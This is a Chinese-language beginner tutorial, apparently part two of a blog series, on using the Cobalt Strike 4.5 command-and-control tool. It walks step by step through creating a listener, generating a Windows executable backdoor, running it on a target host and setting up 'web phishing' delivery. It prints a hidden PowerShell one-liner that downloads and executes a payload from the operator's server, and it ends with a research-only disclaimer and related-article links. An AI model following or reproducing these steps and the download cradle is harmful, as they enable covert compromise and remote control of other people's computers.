小白学习Cobalt Strike4.5(二)

简介: 小白学习Cobalt Strike4.5(二)

一、添加监听器

1、点击菜单栏下面那个耳机的图标,出现监听器选项卡,然后点击添加


2、修改关键参数,填写服务端的ip地址192.168.0.108,HTTP上线端口可以是任意端口,这里改为8888,然后点击保存

3、自动将监听器添加到下面的选项卡里

二、生成后门

1、点击攻击,选择生成后门,再选择Windows可执行程序(E)

2、点击选择按钮,添加上一步生成的名为ayou的监听器,点击选择,然后回到对话框,再点击生成。

三、获取目标主机

将生成的exe文件,在目标主机上运行,获取目标主机信息

四、web钓鱼

1、点击攻击,选择web钓鱼(W),选择web投递(Stageless)

2、选择上一步生成的名为aiyou的监听器,然后点击运行


3、会程程一条命令,让目标主机通过powershell执行该命令

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.108:80/a'))"


4、主机成功上线

仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。

相关文章
|
4月前
|
安全 Linux 数据安全/隐私保护
小白学习Cobalt Strike4.5(一)
小白学习Cobalt Strike4.5(一)
119 0
|
3月前
|
Linux 编译器 数据处理
深入了解Linux命令ld.gold:快速链接器的奥秘
`ld.gold`是GNU的快速链接器,设计用于加速大型项目的链接,尤其擅长并行处理和增量链接。它与标准的`ld`高度兼容,可通过`-fuse-ld=gold`选项启用。例如,`gcc -o my_program file1.c file2.c file3.c -Wl,--ld-as-needed -fuse-ld=gold`命令使用`ld.gold`链接多个源文件。最佳实践包括确保环境支持、利用多线程和启用增量链接。
|
4月前
|
Ubuntu Java Shell
Cobalt Strike配置
Cobalt Strike配置
107 0
|
Windows
小白学习Cobalt Strike4.5(五)2
小白学习Cobalt Strike4.5(五)2
小白学习Cobalt Strike4.5(四)2
小白学习Cobalt Strike4.5(四)2
|
安全
小白学习Cobalt Strike4.5(四)1
小白学习Cobalt Strike4.5(四)1
|
Java C# C语言
小白学习Cobalt Strike4.5(五)1
小白学习Cobalt Strike4.5(五)1
204 0
|
11月前
|
编译器 C语言 C++
聊聊Cobalt Strike 4.1的 BOF
聊聊Cobalt Strike 4.1的 BOF
|
11月前
|
安全 Ubuntu Linux
探险月球——Linux上的Moon Buggy游戏体验
Moon Buggy是一款简单却极具挑战性的游戏,在Linux系统中备受欢迎。在游戏中,你将驾驶一辆登月车,在月球表面跳跃、避免障碍物,体验一种别样的探险。本文将介绍如何在Linux上安装、运行和玩Moon Buggy,以及一些游戏中的基本操作和策略。
165 0
|
网络协议 安全 Java
工具 | Cobalt Strike基本使用
工具 | Cobalt Strike基本使用
481 0